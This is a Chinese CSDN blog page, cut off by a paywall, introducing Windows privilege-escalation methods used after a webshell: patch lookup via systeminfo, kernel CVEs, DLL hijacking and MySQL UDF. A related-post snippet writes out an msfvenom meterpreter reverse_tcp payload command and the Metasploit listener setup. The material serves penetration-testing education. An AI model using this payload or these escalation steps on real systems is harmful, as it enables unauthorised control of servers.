Windows常见的几种提权方法

最新推荐文章于 2025-05-27 09:39:33 发布
最新推荐文章于 2025-05-27 09:39:33 发布
阅读量1w 收藏 108
点赞数 6
CC 4.0 BY-SA版权
文章标签: web安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/124882702
本文介绍了Windows渗透测试中常用的提权方法,包括补丁查询法、CVE-2016-3225、CVE-2014-4113、CVE-2020-0787提权,本地DLL劫持和MySQL UDF提权。通过这些方法,攻击者可以提升权限,控制目标服务器。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

零基础学黑客,搜索公众号:白帽子左一

作者:掌控安全—杰斯

提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限

在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。

这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。

1.补丁查询法

简介
补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的性能,而去使用一种安全措施。

当拿到目标应用的webshell之后,可以通过补丁查询的方法,来查看目标系统是否有未打补丁从而造成的某些安全隐患,从而可以被我们利用。

复现
第一步:执行命令 systeminfo ,将执行结果复制。

图片

第二步:粘贴到补丁查询的网页上进行查询。

图片

ps:http://bugs.hacking8.com/tiquan/ # 提权辅

最低0.47元/天 解锁文章
zkzq
关注
Windows几种常用姿势
01-11 4万+
当获取主机限时,我们总是希望可以将普通用户升为管理员用户,以便获得高限完全控制目标主机。Windows常用的方式有:内核、数据库、系统配置错误、组策略首选项、B...
HW之红队常见Linux的几种方法
hackzkaq的博客
05-30 1254
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 前言 HW即将开始,不管是 Windows 还是 Linux 方法都非常之多,实际情况下,还是需要根据对应的情况选择对应的方法,今天就Linux常见几种方式做个整理. 想要复习windows上期分享过,点击查看图片:HW之红队常见Windows几种方法、 HW之红队常见Windows几种限维持 Linux常见几种方法 高自己在服务器中的限,主要针对网站入侵过程中,当渗透某一网站时,通过各种漏洞
最全windows总结(建议收藏)
小司机的奥拓
07-09 1845
可分为纵向与横向:纵向:低限角色获得高限角色的限;横向:获取同级别角色的限。Windows常用的方法有:系统内核溢出漏洞、数据库、错误的系统配置、组策略首选项WEB中间件漏洞、DLL劫持、滥用高危限令牌、第三方软件/服务等。
系统之:Windows
f_carey的博客
11-04 3106
郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 1 利用漏洞1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误2.1 系统服务限配置错误2.1.1 利用 Po.
Windows 指南
最新发布
weixin_32821251的博客
05-27 19
男儿若遂平生志,五经勤向窗前读。
Windows系统常见方式
m0_64481831的博客
03-26 2351
依然要查看一些条件,最简单的办法就是直接尝试,能成功就成功,因为现实的环境都是很复杂的。
Windows
qq_59102311的博客
05-08 2571
windows限认识(用户及用户组):Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些限(permissions),它们具有管理本地计算机或访问本地资源的限。
windows系统
weixin_53639243的博客
04-23 4639
方法
Windows,Linux等系统工具
01-20
本文将详细介绍几种常见的用于Windows和Linux系统的工具及其使用方法。 ### 知识点二:Linux工具——Linux_Exploit_Suggester #### 工具介绍 Linux_Exploit_Suggester是一款用于Linux系统的工具,它...
lpk.rar_delphi _
09-21
在深入理解这个技术时,我们需要关注以下几个关键知识点: 1. **Delphi编程**:Delphi的语法特性,如何编写DLL(动态链接库),以及如何利用Delphi的事件驱动模型进行系统调用。 2. **DLL注入**:将"lpk.dll...
黑客在Windows系统下的20种主要姿势!从零基础到精通,收藏这篇就够了!
Javachichi的博客
01-18 1312
针对以上攻击方法,可以采取以下防范措施来加强系统的安全性:(1)及时更新系统补丁• 定期检查和安装Windows系统及其应用程序的安全更新和补丁,以修复已知的安全漏洞。• 使用自动化工具或配置管理系统来确保补丁的及时部署。(2)强化访问控制和身份验证• 实施严格的访问控制策略,限制对敏感数据和系统的访问。• 使用多因素身份验证方法,如密码、生物识别、硬件令牌等,增加账户的安全性。• 定期审查和更新用户限,确保最小限原则的实施。(3)配置安全策略和服务。
Kotlin 实现动态获的两种方式?
yyxhzdm的博客
09-21 1057
一、自定义 1.在项目的BaseActivity添加代码 /** * 动态获 * */ /** * 动态获请求值 */ private var REQUEST_CODE_PERMISSION = 0x00099 protected val TAG = this.javaClass.simpleName /** * 请求限 * 动态获 * @param permissions 请求的限 * @param requestCode 请求限的请求码 */ open fun re
Windows最最最常见几种方法
2301_80115097的博客
12-12 1507
Windows SMB 服务器特升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特升漏洞,成功利用此漏洞的攻击者可以使用升的特执行任意代码。高自己在服务器中的限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞WEBSHELL限以夺得该服务器限,通常是把普通用户的升到管理员限或者系统限。要利用此漏洞,攻击者首先必须登录到系统。
Windows方法简单总结
热门推荐
渗透之路,攻防之间皆学问
03-23 1万+
是后渗透重要的一环节,在限较低的情况下,我们在进行一些操作如读取/写入敏感文件、限维持等会受到束缚,所以需要。 在实际中我们会碰到工作组和域环境,工作组环境我们的目的是从普通用户限到管理员或者system限。而域环境中我们通常是从域用户到域管理员限。
常见Windows方法
weixin_48968378的博客
12-14 3977
目录 1、无引号路径(Trusted Service Paths) 2、易受到攻击的服务(Vulnerable Services) 3、AlwaysInstallElevated(始终安装高架) 4、信息泄露 5、基于资源的域约束性委派利用 6、POTATO家族 7、MySQL下的技术 MOF UDF 启动项 8、命令管道 9、令牌窃取 10、常见WindowsCVE 1、无引号路径(Trusted Service Paths) 原理:利用.
windows几种姿势
weixin_44300286的博客
09-07 4576
一、工具 1、msf 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
黑客在Windows系统下的8种主要姿势,从零基础到精通,收藏这篇就够了!
Libra1313的博客
04-03 1332
Windows的世界里,
Window怎么
weixin_42581003的博客
12-27 339
是指在操作系统中获取更高限的过程。在 Windows 系统中,通常有两种方法可以: 使用管理员账户登录系统。在 Windows 系统中,管理员账户具有最高限,可以执行任何操作。如果你的账户是管理员账户,则可以直接使用该账户登录系统。 使用 "管理员" 身份运行某个程序。如果你的账户不是管理员账户,但你希望运行某个程序时具有管理员限,则可以使用 "管理员" 身份运行该程序。要这样做...
windows系统方法
05-31
Windows系统攻击是指攻击者利用Windows系统中的漏洞或者配置不当来升自己的限,从而获得系统的完全控制。下面列举几种常见Windows系统攻击方法: 1. 利用系统漏洞:攻击者可以利用Windows系统中的漏洞来升自己的限。比如,利用Windows系统中的SMB漏洞、WebDAV漏洞等,通过网络攻击获得系统限。 2. 利用应用程序漏洞:攻击者可以利用Windows系统中的应用程序漏洞来升自己的限。比如,利用Adobe Flash、Java等应用程序中的漏洞,通过攻击获得系统限。 3. 利用系统配置不当:攻击者可以利用Windows系统中的配置不当来升自己的限。比如,利用系统管理员错误配置、共享文件夹限不当等,通过攻击获得系统限。 4. 利用系统工具:攻击者可以利用Windows系统中的一些工具来升自己的限。比如,利用Windows系统中的net user命令、UAC绕过等,通过攻击获得系统限。 为了防止Windows系统攻击的发生,建议用户采取以下几点措施: 1. 定期更新系统和应用程序的安全补丁; 2. 对系统和应用程序进行适当的配置,限制外部访问; 3. 使用强密码和多因素身份验证; 4. 启用防病毒软件和防火墙; 5. 定期审查系统日志,及时发现异常行为; 6. 对用户进行安全教育和培训,安全意识。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值